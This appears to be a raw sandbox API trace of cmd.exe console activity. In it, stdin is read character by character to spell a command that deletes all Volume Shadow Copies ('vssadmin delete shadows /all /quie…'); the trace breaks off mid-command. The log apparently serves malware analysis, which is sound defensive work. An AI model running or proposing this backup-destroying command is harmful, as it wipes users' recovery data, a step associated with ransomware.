[0046.673] GetProcessHeap () returned 0x290000 [0046.673] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291ab0 | out: hHeap=0x290000) returned 1 [0046.673] LocalFree (hMem=0x2a97e0) returned 0x0 [0046.673] GetProcessHeap () returned 0x290000 [0046.673] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2aaa10 | out: hHeap=0x290000) returned 1 [0046.673] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f758 | out: _Buffer="\r\n") returned 2 [0046.673] _get_osfhandle (_FileHandle=1) returned 0xec [0046.673] GetFileType (hFile=0xec) returned 0x3 [0046.673] _get_osfhandle (_FileHandle=1) returned 0xec [0046.673] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0046.673] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f728, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16f728*=0x2, lpOverlapped=0x0) returned 1 [0046.673] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0046.673] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.673] _vsnwprintf (in: _Buffer=0x4a4beb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f768 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0046.673] _vsnwprintf (in: _Buffer=0x4a4bebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16f768 | out: _Buffer=">") returned 1 [0046.673] _get_osfhandle (_FileHandle=1) returned 0xec [0046.673] GetFileType (hFile=0xec) returned 0x3 [0046.674] _get_osfhandle (_FileHandle=1) returned 0xec [0046.674] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0046.674] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x16f758, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16f758*=0x26, lpOverlapped=0x0) returned 1 [0046.674] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.674] GetFileType (hFile=0xa0) returned 0x3 [0046.674] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.674] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.674] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce320, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0046.675] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.675] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.675] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce322, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.675] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.675] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.675] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce324, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.675] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.675] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.675] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce326, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0046.675] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.675] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.675] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce328, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0046.675] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.675] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.675] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32a, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0046.676] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.676] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.676] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0046.676] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.676] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.676] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0046.676] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.676] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.676] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.676] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.676] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.676] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce332, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0046.676] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.676] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.676] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce334, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.677] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.677] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.677] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce336, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0046.677] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.677] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.677] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce338, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.677] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.677] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.677] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33a, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.677] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.677] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.677] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.678] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.678] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.678] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.678] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.678] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.678] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce340, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.678] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.678] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.678] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce342, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0046.678] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.678] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.678] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce344, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0046.679] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.679] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.679] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce346, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0046.679] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.679] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.679] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce348, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0046.679] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.679] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.679] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0046.679] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.679] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.679] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.680] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.680] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.680] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.680] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.680] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.680] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0046.680] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.680] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.680] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0046.680] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.680] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.680] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0046.681] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.681] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.681] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0046.681] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.681] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.681] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.681] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.681] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.681] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0046.681] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.681] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.681] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0046.682] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.682] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.682] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0046.682] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.682] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.682] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0046.682] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.682] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.682] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.682] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.682] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, 